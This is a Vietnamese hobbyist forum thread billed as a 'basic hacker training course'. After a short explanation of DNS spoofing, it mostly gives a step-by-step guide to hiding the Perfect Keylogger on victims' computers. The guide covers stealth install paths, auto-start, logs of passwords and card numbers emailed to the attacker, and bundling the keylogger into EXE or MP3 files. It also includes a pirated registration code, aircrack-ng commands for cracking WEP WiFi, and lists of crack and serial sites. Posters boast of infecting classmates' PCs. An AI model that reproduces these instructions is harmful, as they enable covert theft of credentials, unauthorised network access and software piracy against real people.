Có những kiểu tấn công DoS khác lại hoạt động gián tiếp. Những kiểu tấn công này thường không tập trung vào server mà thay vào đó, mục tiêu sẽ là client. Trong trường hợp này, máy tính client sẽ bị đánh lừa về nơi mà nó muốn đi lấy thông tin. Ví dụ, nếu bạn nghĩ rằng máy tính của bạn sẽ đi đến www.yahoo.com, nhưng hóa ra lại đi đến trang na ná như Yahoo! của hacker, thì có thể vô tình bạn đã cung cấp cho hacker password và những thông tin cá nhân của mình.
Bình thường, một máy tính client sẽ dùng query để hỏi DNS server, khi nó muốn đổi một tên domain hay một địa chỉ trang Web ra thành một địa chỉ IP. Có chuyện này, bởi vì máy tính client cần địa chỉ IP để định vị Web server hay email server dùng tên domain nó đang quan tâm. Quá trình này được tiến hành qua ba bước như sau :
1.Client hỏi DNS server địa chỉ IP ứng với tên domain là bao nhiêu.
2. DNS server sẽ dùng các query để tên domain đã được hỏi.
3. Client kết nối với Web server theo địa chỉ IP đã được DNS server cung cấp.
Tuy vậy, quá trình này có thể dễ dàng bị lợi dụng để đẩy các user cả tin đến những trang Web tầm bậy, hoặc hướng dẫn email đi (outgoing email) phải đi qua những máy tính bất lương. Việc này được thực hiện bằng cách ghi các địa chỉ IP sai vào database của DNS server . Khi điều này xảy ra, hầu như client không thể nhận ra được là đang có vấn đề. Khả năng bại lộ duy nhất chỉ có khi các entry của DNS sever được kiểm tra một cách đặc biệt, hoặc server của hacker bị down.
Trong trường hợp một entry của DNS server bị hack, chỉ có những email đi mới bị gửi đến khu vực lừa đảo, trừ phi mail server sử dụng cùng một DNS server với client. Trong trường hợp tệ hại như thế, cả email đi lẫn email đến (incoming email) đều bị hướng dẫn phải đi qua một máy tính bất lương. Tuy nhiên, trong ví dụ của chúng ta, giả định rằng mail server đang dùng một DNS server rất an ninh để phân giải tên các domain.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Trong trườnghợp DNS server bị hack thì :
1. Client B hỏi địa chỉ IP của “youremail.com”
2. DNS server đã bị hack sẽ trả lời lại một địa chỉ IP đã bị giả mạo là 192.168.0.10
3. Client B kết nối với mail server giả mạo và gửi mail đi.
4. Server giả mạo sẽ tạo bản email copy rồi gửi đến mail server thật.
5. Mail server thật-dùng một DNS server an ninh-sẽ gửi mail đến client như bình thường.
Kịch bản như trên có thể sẽ cung cấp cho hacker một số thông tin có giá trị. Ví dụ như, nếu client B là một bác sĩ hay một luật sư, hacker sẽ có thể truy xuất các hồ sơ nhạy cảm. Nếu client B đang làm việc trong một dự án tối mật, hacker có thể bán các thông tin cho một công ty cạnh tranh. Hoặc nếu như client đang được dùng như một trang Web bán hàng trực tuyến, hacker có thể chộp được từng email xác nhận (confirmation email), trong đó có đầy đủ địa chỉ khách hàng hoặc/và số của thẻ tín dụng.
Như bạn cũng thấy, một màn lừa đảo DNS có khả năng phá hoại rất rộng lớn. Khi hacker muốn biến mất một trang Web hay muốn chộp các email, hắn ta chỉ việc từ chối dịch vụ những ai dùng trúng DNS server đã bị hack. Tuy nhiên cũng có một cách giải quyết vấn đề này.
Các DNS server có thể được cấu hình sao cho an ninh hơn. Thực tế đánh giá cho thấy có khoảng một nửa đến ba phần tư số DNS server là chẳng có an ninh gì cả. Đây là vấn đề đã biết, vì vậy nếu bạn quan ngại rằng có khả năng các DNS server của bạn cũng chẳng an ninh, hãy tiếp xúc với ISP (Internet Service Provider : nhà cung cấp dịch vụ Internet) của mình và phỏng vấn họ về những software họ đã dùng; cũng như có an toàn không nếu bị tấn công theo kiểu lừa đảo. Hy vọng rằng, họ sẽ biết bạn đang nói về cái gì và sẽ cho bạn các câu trả lời xác đáng.
Qua 4 phần của bài viết này , tôi vừa giải thích một số cách hacker dùng để vô hiệu hoá hoặc làm sụp đổ các hệ thống tiêu mà không cần phải xâm nhập. Với các kỹ thuật làm tràn ngập kết nối giả mạo, làm sụp đổ do tràn bộ nhớ đệm hay lừa đảo DNS, các hacker có thể làm cho cuộc sống của bạn trở nên khốn đốn. Hơn nữa, mặc dù trong những kiểu tấn công này, hacker không thể xâm nhập được, nhưng nếu chúng được dùng kết hợp với những kiểu tấn công khác, các hacker có thể chiếm được quyền truy cập trái phép. Ví dụ, một hacker có thể sẽ nã dồn dập (hammer) firewall của bạn, đảm bảo giữ cho firewall của bạn trở nên quá bận bịu với việc sắp xếp các dữ liệu để trả lời vô ích. Điều này về lý thuyết đã cho phép hacker truy cập thoải mái hệ thống của bạn.
1. Client B hỏi địa chỉ IP của “youremail.com”
2. DNS server đã bị hack sẽ trả lời lại một địa chỉ IP đã bị giả mạo là 192.168.0.10
3. Client B kết nối với mail server giả mạo và gửi mail đi.
4. Server giả mạo sẽ tạo bản email copy rồi gửi đến mail server thật.
5. Mail server thật-dùng một DNS server an ninh-sẽ gửi mail đến client như bình thường.
Kịch bản như trên có thể sẽ cung cấp cho hacker một số thông tin có giá trị. Ví dụ như, nếu client B là một bác sĩ hay một luật sư, hacker sẽ có thể truy xuất các hồ sơ nhạy cảm. Nếu client B đang làm việc trong một dự án tối mật, hacker có thể bán các thông tin cho một công ty cạnh tranh. Hoặc nếu như client đang được dùng như một trang Web bán hàng trực tuyến, hacker có thể chộp được từng email xác nhận (confirmation email), trong đó có đầy đủ địa chỉ khách hàng hoặc/và số của thẻ tín dụng.
Như bạn cũng thấy, một màn lừa đảo DNS có khả năng phá hoại rất rộng lớn. Khi hacker muốn biến mất một trang Web hay muốn chộp các email, hắn ta chỉ việc từ chối dịch vụ những ai dùng trúng DNS server đã bị hack. Tuy nhiên cũng có một cách giải quyết vấn đề này.
Các DNS server có thể được cấu hình sao cho an ninh hơn. Thực tế đánh giá cho thấy có khoảng một nửa đến ba phần tư số DNS server là chẳng có an ninh gì cả. Đây là vấn đề đã biết, vì vậy nếu bạn quan ngại rằng có khả năng các DNS server của bạn cũng chẳng an ninh, hãy tiếp xúc với ISP (Internet Service Provider : nhà cung cấp dịch vụ Internet) của mình và phỏng vấn họ về những software họ đã dùng; cũng như có an toàn không nếu bị tấn công theo kiểu lừa đảo. Hy vọng rằng, họ sẽ biết bạn đang nói về cái gì và sẽ cho bạn các câu trả lời xác đáng.
Qua 4 phần của bài viết này , tôi vừa giải thích một số cách hacker dùng để vô hiệu hoá hoặc làm sụp đổ các hệ thống tiêu mà không cần phải xâm nhập. Với các kỹ thuật làm tràn ngập kết nối giả mạo, làm sụp đổ do tràn bộ nhớ đệm hay lừa đảo DNS, các hacker có thể làm cho cuộc sống của bạn trở nên khốn đốn. Hơn nữa, mặc dù trong những kiểu tấn công này, hacker không thể xâm nhập được, nhưng nếu chúng được dùng kết hợp với những kiểu tấn công khác, các hacker có thể chiếm được quyền truy cập trái phép. Ví dụ, một hacker có thể sẽ nã dồn dập (hammer) firewall của bạn, đảm bảo giữ cho firewall của bạn trở nên quá bận bịu với việc sắp xếp các dữ liệu để trả lời vô ích. Điều này về lý thuyết đã cho phép hacker truy cập thoải mái hệ thống của bạn.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Em chịu chú Thái rồi, chỉ cần chú cop cho em mấy cái chương trình kích hoạt virus cũng được rồi, hok cần hack đâu, mà hack thì chú thử hack game đi, xong nói cách làm với em!
gundam_des- Kẻ QRTD
- Tổng số bài gửi : 359
Join date : 09/06/2009
Age : 29
Đến từ : Barcelona
Re: chương trình đào tạo hacker ( khóa cơ bản )
hack game khá vui , nhưng vài lần thử với gameonline , hôm sau bị đá rồi , chán quá !!
phải trình bày cái này tại tình hình chiến sự lớp ta khá là ....... .... nhiều tên đe dọa hack máy nhau ( ko hiểu chém gió hay là thật) , phải đọc cái này để đôi lúc hiểu tại sao PC nhà mình tự nhiên die ??? hay là mất hết dữ liệu ???
phải trình bày cái này tại tình hình chiến sự lớp ta khá là ....... .... nhiều tên đe dọa hack máy nhau ( ko hiểu chém gió hay là thật) , phải đọc cái này để đôi lúc hiểu tại sao PC nhà mình tự nhiên die ??? hay là mất hết dữ liệu ???
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Haha, Thái cóa hack game online nào cứ share cho tớ, thanks nhìu lắm!!
gundam_des- Kẻ QRTD
- Tổng số bài gửi : 359
Join date : 09/06/2009
Age : 29
Đến từ : Barcelona
Re: chương trình đào tạo hacker ( khóa cơ bản )
hồi xưa hack audition chơi vô cùng tốt , 2 hôm sau máy nhiễm virus , mất luôn file này
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
một trong những phần mềm hack tự bản thân thấy tốt nhất bây giờ , thành tích của tớ , từng hack thành công liền một lúc PC của Thắng , Q. Dương , Trang , K. Dương , Lâm và Đức Anh .
Perfect Keylogger
Giới thiệu với các bạn Percfect Keylogger V1.62 là 1 trong 10 con keyloger nguy hiểm nhất ;( Xếp hạng thứ tư là Perfect Keylogger – "gián điệp" này có khả năng ghi lại các ký tự nhập từ bàn phím, các mật khẩu, số thẻ tín dụng.) Các file log của nó gửi về Email cho chủ nhân rất dễ phân tích và truy cứu số liệu . Nếu download được phiên bản mới nhất và cài đặt đúng phương pháp thì nó có thể lấy được pass của các cách sử dụng qua “bàn phìm ảo”.Gần đây nhất chúng tôi đã phát hiện nó đã lấy thành công mật khẩu thùng đồ của VLTK .
Đặc điểm của Perfect Keylogger 1.62 là nó tạo ra được file Remote Install với dung lượng nhỏ (khoảng 200kb) Chúng ta có thể cho file này ẩn nấp (nhúng vào , lồng ghép ) dưới rất nhiều dạng File để dụ Victim vào bẩy.(exe ; Image ; Mp3 ; Steath Icon ) .Cách dùng Perfect Keylogger này rất hiệu quả và thông dụng . Tuy nhiên vì tính chất " nguy hiểm và bén nhạy" của nó mà hiện nay nó bị hầu hết các loại AntiVirus có tiếng tăm loại trừ hẳn .Cách cài đặt và sử dụng sẽ được giới thiệu sau đây :
Các bạn download tại đây :
http://www.blazingtools.com/downloads/i_bpk2003.exe
Registration :
Name : TeaM aCMe
Code : LXPN-IWCY-WOMI-IVCE
Sau đó run file .exe .
Trước tiên bạn sẽ thấy màn hình :
https://2img.net/h/i63.photobucket.com/albums/h128/hin...ctKeylogger.jpg
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger1.jpg
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger2.jpg
Keyword : Cac ban chon mot cai ten sao cho Victim khi tim ra phai lung tung lua chon de DEL ; thi du : YahooWXC hay WinLogon hay NortonFind ; hay OfficeXP v.v… ; noi chung la tuy y .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger3.jpg
Perfect Keylogger
Giới thiệu với các bạn Percfect Keylogger V1.62 là 1 trong 10 con keyloger nguy hiểm nhất ;( Xếp hạng thứ tư là Perfect Keylogger – "gián điệp" này có khả năng ghi lại các ký tự nhập từ bàn phím, các mật khẩu, số thẻ tín dụng.) Các file log của nó gửi về Email cho chủ nhân rất dễ phân tích và truy cứu số liệu . Nếu download được phiên bản mới nhất và cài đặt đúng phương pháp thì nó có thể lấy được pass của các cách sử dụng qua “bàn phìm ảo”.Gần đây nhất chúng tôi đã phát hiện nó đã lấy thành công mật khẩu thùng đồ của VLTK .
Đặc điểm của Perfect Keylogger 1.62 là nó tạo ra được file Remote Install với dung lượng nhỏ (khoảng 200kb) Chúng ta có thể cho file này ẩn nấp (nhúng vào , lồng ghép ) dưới rất nhiều dạng File để dụ Victim vào bẩy.(exe ; Image ; Mp3 ; Steath Icon ) .Cách dùng Perfect Keylogger này rất hiệu quả và thông dụng . Tuy nhiên vì tính chất " nguy hiểm và bén nhạy" của nó mà hiện nay nó bị hầu hết các loại AntiVirus có tiếng tăm loại trừ hẳn .Cách cài đặt và sử dụng sẽ được giới thiệu sau đây :
Các bạn download tại đây :
http://www.blazingtools.com/downloads/i_bpk2003.exe
Registration :
Name : TeaM aCMe
Code : LXPN-IWCY-WOMI-IVCE
Sau đó run file .exe .
Trước tiên bạn sẽ thấy màn hình :
https://2img.net/h/i63.photobucket.com/albums/h128/hin...ctKeylogger.jpg
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger1.jpg
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger2.jpg
Keyword : Cac ban chon mot cai ten sao cho Victim khi tim ra phai lung tung lua chon de DEL ; thi du : YahooWXC hay WinLogon hay NortonFind ; hay OfficeXP v.v… ; noi chung la tuy y .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger3.jpg
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Cac ban change dia chi de setup vao (rat quan trong de an nap) theo toi chon :
C:\Program Files\Yahoo!\Messenger hay :
C:\WINDOWS\system hay
C:\Program Files\Common Files\Microsoft Shared\DAO
Nhung dia chi nay Victim rat kho phat hien .
Ở bước này bạn chọn check box số 2 là : Stealth Installation .(để không có bảng báo cáo trong "add remove program"
Phần còn lại bam next tiếp tục .
Cac thao tac ke tiep de setup cac ban biet roi , cuoi cung la dien Usename vas pass cua chuong trinh vao bang Registration
Sau đây là cách để bạn thao tác với control panel :
Click chuột phải chọn Options.
vào màn hình đâu tiên Seting lại các dữ liệu như:
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger5.jpg
Sho/hide program Icon : Chon phim tat de goi chuong trinh ra
Ví dụ : Ctrl + Alt + L .hoặc v..v…(Bạn phải nhớ phím tắt này nếu không thì không gọi nó ra được để tạo file Remote Install)
Chọn check box Run on windows startup .
Chọn check box Don't show program icon at startup
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger6.jpg
Set Password : dien pass de mo chuong trinh
Khong chon : Monitor only……….
Chọn hết tất cả các check box tại log này
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger9.jpg
Khong nen chon Capture man hinh (Bo tat ca cac dau kiem)
File hình ảnh chỉ làm Mail gửi về có dung lượng cao . Nhưng đối với các bàn phím ảo thì nó rất hiệu quả khi ta chỉ cần đánh Victim trong vài ngày là rút lui bí mật .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger7.jpg
chọn thời gian mỗi lần keylog ghi nhận rồi send back lại cho bạn log : ví dụ mình chọn send về 1 mail sau mỗi 30 phut
Chon send log only ………… thi du : 100 kb .
Nhấn qua Deliever để điền mail .
bạn điền email bạn vào
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger8.jpg
Đây là phần cài đặt các thông số để con Keylogger tự động gửi Email về cho chủ nhân nó . Rất nhiều bạn đã lúng túng không biết lấy các thông số này từ đâu và thường bị thất bại tại bước này . Các bạn chú ý từng thao tác nhé :
Tại bảng này bấm vào "Email" bên trái bảng >
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger6.jpg
bấm vào Delivery Bảng mới này hiện ra >
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/1s.png
Send to : Điền địa chỉ Email bạn muốn nó gửi về
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/2s.png
Username và password(của hòm thư) :điền của địa chỉ email đã điiền trên .(Nên dùng Mail gửi và nhận cùng 1 địa chỉ )
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/4s.png
SMTP : phần này rất quan trọng .( mà hiện giờ rất nhiều người thắc mắc mà chưa có lời giải đáp )
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/3.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/3.png
ở đây tôi nêu cho các bạn gmail và yahoo (Nên chọn GMAIL để gửi và nhận thư )
GMAIL :
gsmtp183.google.com
gsmtp163.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
========================
YAHOO MAIL:
mx4.mail.yahoo.com
mx1.mail.yahoo.com
mx2.mail.yahoo.com
mx3.mail.yahoo.com
=>=> bọn gmail này đảm bảo dùng rất cool , Ít khi bị kẹt Mail trên Server .
Chọn một trong những địa chỉ SMTP này để đièn vào ô tương xứng . Điều quan trọng ở đây là Gmail chỉ gửi cho Gmail và yahoo mail chỉ gửi được cho yahoo mail.
Authentication : chọn NON
Bấm vào Send test để thử .Nếu thành công các bạn sẽ được thông báo như sau :
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/5.png
Tiếp theo : Tạo file Remote Install
TẠO FILE REMOTE INSTALL
(Chỉ trong vòng 10 giây con Keylogger đã được setup vào máy hoặc Victim chỉ cần kích vào là ta đã thành công)
Tại phía dưới bên phải màn hình > kích phải vào biểu tượng hình cuộn phim > chọn Remote Installation
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/6.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/7.png
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/8s.png
Bấm vào : BROWSE để chỉ file dẫn cho con keylogger nhúng vào . Có thể chọn file EXE hay file nhạc v.v..
Bấm NEXT > NEXT > Finish .
File mới được tạo ra có tên đầu là : inst+tên gốc của file dẫn , Ta có thể đổi tên file này lại tùy ý .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/9.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...re/SNAG-suc.jpg
C:\Program Files\Yahoo!\Messenger hay :
C:\WINDOWS\system hay
C:\Program Files\Common Files\Microsoft Shared\DAO
Nhung dia chi nay Victim rat kho phat hien .
Ở bước này bạn chọn check box số 2 là : Stealth Installation .(để không có bảng báo cáo trong "add remove program"
Phần còn lại bam next tiếp tục .
Cac thao tac ke tiep de setup cac ban biet roi , cuoi cung la dien Usename vas pass cua chuong trinh vao bang Registration
Sau đây là cách để bạn thao tác với control panel :
Click chuột phải chọn Options.
vào màn hình đâu tiên Seting lại các dữ liệu như:
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger5.jpg
Sho/hide program Icon : Chon phim tat de goi chuong trinh ra
Ví dụ : Ctrl + Alt + L .hoặc v..v…(Bạn phải nhớ phím tắt này nếu không thì không gọi nó ra được để tạo file Remote Install)
Chọn check box Run on windows startup .
Chọn check box Don't show program icon at startup
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger6.jpg
Set Password : dien pass de mo chuong trinh
Khong chon : Monitor only……….
Chọn hết tất cả các check box tại log này
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger9.jpg
Khong nen chon Capture man hinh (Bo tat ca cac dau kiem)
File hình ảnh chỉ làm Mail gửi về có dung lượng cao . Nhưng đối với các bàn phím ảo thì nó rất hiệu quả khi ta chỉ cần đánh Victim trong vài ngày là rút lui bí mật .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger7.jpg
chọn thời gian mỗi lần keylog ghi nhận rồi send back lại cho bạn log : ví dụ mình chọn send về 1 mail sau mỗi 30 phut
Chon send log only ………… thi du : 100 kb .
Nhấn qua Deliever để điền mail .
bạn điền email bạn vào
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger8.jpg
Đây là phần cài đặt các thông số để con Keylogger tự động gửi Email về cho chủ nhân nó . Rất nhiều bạn đã lúng túng không biết lấy các thông số này từ đâu và thường bị thất bại tại bước này . Các bạn chú ý từng thao tác nhé :
Tại bảng này bấm vào "Email" bên trái bảng >
https://2img.net/h/i63.photobucket.com/albums/h128/hin...tKeylogger6.jpg
bấm vào Delivery Bảng mới này hiện ra >
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/1s.png
Send to : Điền địa chỉ Email bạn muốn nó gửi về
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/2s.png
Username và password(của hòm thư) :điền của địa chỉ email đã điiền trên .(Nên dùng Mail gửi và nhận cùng 1 địa chỉ )
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/4s.png
SMTP : phần này rất quan trọng .( mà hiện giờ rất nhiều người thắc mắc mà chưa có lời giải đáp )
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/3.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/3.png
ở đây tôi nêu cho các bạn gmail và yahoo (Nên chọn GMAIL để gửi và nhận thư )
GMAIL :
gsmtp183.google.com
gsmtp163.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
========================
YAHOO MAIL:
mx4.mail.yahoo.com
mx1.mail.yahoo.com
mx2.mail.yahoo.com
mx3.mail.yahoo.com
=>=> bọn gmail này đảm bảo dùng rất cool , Ít khi bị kẹt Mail trên Server .
Chọn một trong những địa chỉ SMTP này để đièn vào ô tương xứng . Điều quan trọng ở đây là Gmail chỉ gửi cho Gmail và yahoo mail chỉ gửi được cho yahoo mail.
Authentication : chọn NON
Bấm vào Send test để thử .Nếu thành công các bạn sẽ được thông báo như sau :
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/5.png
Tiếp theo : Tạo file Remote Install
TẠO FILE REMOTE INSTALL
(Chỉ trong vòng 10 giây con Keylogger đã được setup vào máy hoặc Victim chỉ cần kích vào là ta đã thành công)
Tại phía dưới bên phải màn hình > kích phải vào biểu tượng hình cuộn phim > chọn Remote Installation
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/6.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/7.png
https://2img.net/h/i63.photobucket.com/albums/h128/hintonclup/8s.png
Bấm vào : BROWSE để chỉ file dẫn cho con keylogger nhúng vào . Có thể chọn file EXE hay file nhạc v.v..
Bấm NEXT > NEXT > Finish .
File mới được tạo ra có tên đầu là : inst+tên gốc của file dẫn , Ta có thể đổi tên file này lại tùy ý .
https://2img.net/h/i63.photobucket.com/albums/h128/hin...0Software/9.png
https://2img.net/h/i63.photobucket.com/albums/h128/hin...re/SNAG-suc.jpg
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
bạn nào hack thành công báo cho tớ nhé !! ( cấm hack máy tớ )
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Oh yeah, hình như là thành công!!! Bật thử máy cũ cài virus vào, kích hoạt nó, cuối cùng máy chầm rì, xong đơ lun. OKOKOKOKOKOKOK, hay, thanks bạn Thái nhá!!
gundam_des- Kẻ QRTD
- Tổng số bài gửi : 359
Join date : 09/06/2009
Age : 29
Đến từ : Barcelona
Re: chương trình đào tạo hacker ( khóa cơ bản )
thấy chưa , đã có người thành công rồi đó ===> gundam xứng đáng đệ tử của ta !!
Lên cấp 3 hack thử máy mấy đứa bạn mới vui !! ( đừng làm với lớp mình nhé )
Lên cấp 3 hack thử máy mấy đứa bạn mới vui !! ( đừng làm với lớp mình nhé )
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
khi nào rồi post tiếp vài cái hack nữa cũng vô cùng funny , cài vào máy nào là chết luôn đó , chắc để sau !!
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Ôi, còn hack nữa nào thì cứ share cho em thưa master, em cho cả cái hàng NET chó chết đấy hỏng máy luôn!!!
gundam_des- Kẻ QRTD
- Tổng số bài gửi : 359
Join date : 09/06/2009
Age : 29
Đến từ : Barcelona
Re: chương trình đào tạo hacker ( khóa cơ bản )
đợi vài hôm nữa anh share cho !!
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
gundam_des- Kẻ QRTD
- Tổng số bài gửi : 359
Join date : 09/06/2009
Age : 29
Đến từ : Barcelona
Re: chương trình đào tạo hacker ( khóa cơ bản )
ngày mai tớ sẽ post cho cả nhà biết cách hack wifi ( đảm bảo 100 % thành công )
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.remote-exploit.org/backtrack_download.html
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
http://www.scribd.com/doc/3816372/hack-password-wifi-bang-backtract
mediafire
http://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.remote-exploit.org/backtrack_download.html
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
http://www.scribd.com/doc/3816372/hack-password-wifi-bang-backtract
mediafire
http://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Tha hồ thử , nhưng bạn nào đến gặp police Thái ko chịu trách nhiệm đâu nhé .
Cái này chỉ nên hack thử ở nhà , hoặc báo trước cho hàng xóm , nếu không nó kiện ra tòa ngồi tù ít nhất 5 năm đó !!
Cái này chỉ nên hack thử ở nhà , hoặc báo trước cho hàng xóm , nếu không nó kiện ra tòa ngồi tù ít nhất 5 năm đó !!
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Tổng hợp các trang web tìm kiếm crack & serial
Crack Sites:
AllCracks.Net, Andr.Net, Crack.Ms,
Crackz.Ws, CrackArchive.Com, CrackDb.Com, CrackzPlanet.Com,
CrackWay.Com, MsCracks.Com, CrackPortal.Com, TheCracks.Us,
KeyGen.Ru
Serial Sites:
Seriall.Com, FreeSerials.Com, SerialSite.Com, Serials.Ws,
Andr.Net, SerialKey.Net, SerialArchive.Com, CrackzPlanet.Com,
MsCracks.Com, CrackPortal.Com, KeyGen.Name, TheKeys.Ws,
FreeSerials.Ws, FreeSerials.Spb.Ru, Serial.220volt.Info,
SerialCodes.Net
Cover Site:
CoverTarget.Com, CoverAll.Come.To, CoverIsland.Com
http://astalavista.box.sk/
http://www.crackcrawler.net/cgi/search.php4 the BEST metasearch for cracks
http://kickme.to/crackwar very good can search 23 engines from 1 page
http://www.megasearch.ws/ search the main engines from here
http://www.bugs2k.com/ a good search site with minimal popups
http://www.andr.net/index.php another good one
http://crackazoid.com/
http://keygen.net/s.htm
http://www.hksoftking.com/v.php
http://www.dream-avenue.com/docky/leportail.htm
http://www.cracks.spb.ru/?... -porn banners
http://www.akribo-search.de.vu/ porn pop ups
http://allseek.info/ too many pop ups
http://www.cracks.am/s.x LOTS of ***** pop ups
http://www.search-explorer.net/installer.php
http://www.toflo.de/htm/link.htm
http://www.ixquick.com/
http://keygen.freeweb.hu/index/m.htm
Cracks and Serials
http://www.eminence.gulli.com/
http://forum.royaume.com/
http://key.winzheng.com/
http://www.exelenz.fr.st/
http://antares666.da.ru/
http://www.deamoncrack.fr.st/
http://hide.at/apizza
http://www.n-genworld.com/
http://www.reptilecracker.com/
http://kickme.to/desperate
http://mp2k.da.ru/
http://kickme.to/tsrh
http://kickme.to/pc2k/
http://kickme.to/dbc
http://zor.org/tnone/
http://dbz.6x.to/
http://evc.to/cracks/
